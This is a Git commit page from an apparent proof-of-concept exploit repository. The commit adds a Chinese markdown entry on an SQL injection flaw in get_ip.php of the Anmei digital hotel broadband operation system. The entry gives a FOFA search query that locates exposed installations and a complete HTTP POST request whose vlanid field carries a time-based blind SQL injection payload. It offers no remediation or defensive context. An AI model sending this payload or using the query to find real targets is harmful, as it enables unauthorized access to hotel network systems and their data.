admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-06-20 01:40:42 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update 安美数字酒店宽带运营系统get_ip.phpSQL注入漏洞.md

Browse Source
This commit is contained in:
Nexolanta 2025-03-08 22:16:30 +08:00 committed by GitHub
parent 7a7d54e83a
commit e4b7bd4915
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 22 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
wpoc/安美数字酒店宽带运营系统/安美数字酒店宽带运营系统get_ip.phpSQL注入漏洞.md
View File

@ -1 +1,23 @@
## 安美数字酒店宽带运营系统get_ip.phpSQL注入漏洞
## fofa
```
title=酒店宽带运营系统
```
## POC
```
POST /user/get_ip.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=3n9dv7r0vl6fcvirnlvp2oh1t4; dashboroad=srgua4gv7d2jnichvtl66l1146
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)
Host:
Connection: Keep-alive
lang=GB&gwip=1&realip=1&vlanid=1'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z
```